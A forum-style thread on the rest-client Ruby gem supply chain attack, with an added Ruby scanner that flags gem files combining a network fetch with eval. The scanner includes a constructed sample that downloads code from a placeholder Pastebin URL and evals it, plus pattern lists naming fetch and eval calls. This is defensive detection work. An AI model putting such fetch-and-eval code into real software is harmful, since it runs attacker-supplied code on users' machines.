PSA: Supply chain attack on rest-client, an extremely widely deployed Ruby library. https://github.com/rest-client/rest-client/issues/713 …
A mitigation here, which you will probably want anyhow, is to only upgrade dependencies based on explicit choice rather than slurping down upgrades optimistically. This mitigation is not normative in some development communities, which may pose some cultural challenges.
Having your application evaluate code grabbed from Pastebin at runtime [0] will *also* pose some cultural challenges, though. [0] The attack payload here.
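Added example, not code from the thread or from the rest-client project: a Ruby scan that flags installed gem files combining a remote fetch with dynamic evaluation, the payload shape the thread describes (code pulled from Pastebin and evaluated at runtime). The indicator lists and the default of walking `Gem.dir` are assumptions; the sample sources are constructed.

```ruby
require 'find'

# Assumed indicators: something that fetches over the network ...
FETCH_PATTERNS = [
  /\bNet::HTTP\b/, /\bopen-uri\b/, /\bURI\.open\b/,
  /\bopen\(\s*['"]https?:/, /pastebin\.com/i, /\bHTTParty\b/, /\bRestClient\b/
].freeze
# ... paired with something that evaluates a string as code.
EVAL_PATTERNS = [
  /\beval\s*\(/, /\binstance_eval\b/, /\bclass_eval\b/,
  /\bmodule_eval\b/, /\bKernel\.eval\b/, /\bObject\.send\(\s*:eval/
].freeze

# Returns { fetch: [...], eval: [...] } listing the matched indicator sources,
# or nil when the file lacks either half of the pattern. Requiring both halves
# keeps ordinary eval use (templating, DSLs) out of the report.
def scan_source(source)
  fetch = FETCH_PATTERNS.select { |re| source.match?(re) }
  evals = EVAL_PATTERNS.select { |re| source.match?(re) }
  return nil if fetch.empty? || evals.empty?
  { fetch: fetch.map(&:source), eval: evals.map(&:source) }
end

# Walks a gem directory (default: the active RubyGems install dir) and returns
# { path => finding } for every .rb file that matches both indicator sets.
# Point it at a vendored bundle path to audit a deployed app offline.
def scan_gem_dir(dir = Gem.dir)
  findings = {}
  Find.find(dir) do |path|
    next unless path.end_with?('.rb') && File.file?(path)
    result = scan_source(File.read(path, encoding: 'UTF-8').scrub)
    findings[path] = result if result
  end
  findings
end

# Constructed sample (not the real payload) showing what a hit looks like.
SAMPLE_HIT = <<~RUBY
  require 'net/http'
  body = Net::HTTP.get(URI('https://pastebin.com/raw/EXAMPLE'))
  eval(body)
RUBY

# Constructed benign sample: eval with no network fetch is not reported.
SAMPLE_CLEAN = "x = eval('1 + 1')\n"
```

Review each hit by hand: the scan is a triage filter, and a gem that legitimately fetches and evals (plugin loaders, for instance) will also appear.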
I’m not really convinced this is feasible for most companies, especially in NPM land. It’s not just reading the GitHub commits, it’s checking that what is released matches what is in GitHub.
For the browser I would first get a Content Security Policy in place to whitelist hosts your app can talk to/download JS from. HTTP only session cookies are good as well. It seems like a good CSP should totally mitigate this attack on the front end?
NPM is 1) wonderfully convenient and 2) absolutely terrifying.
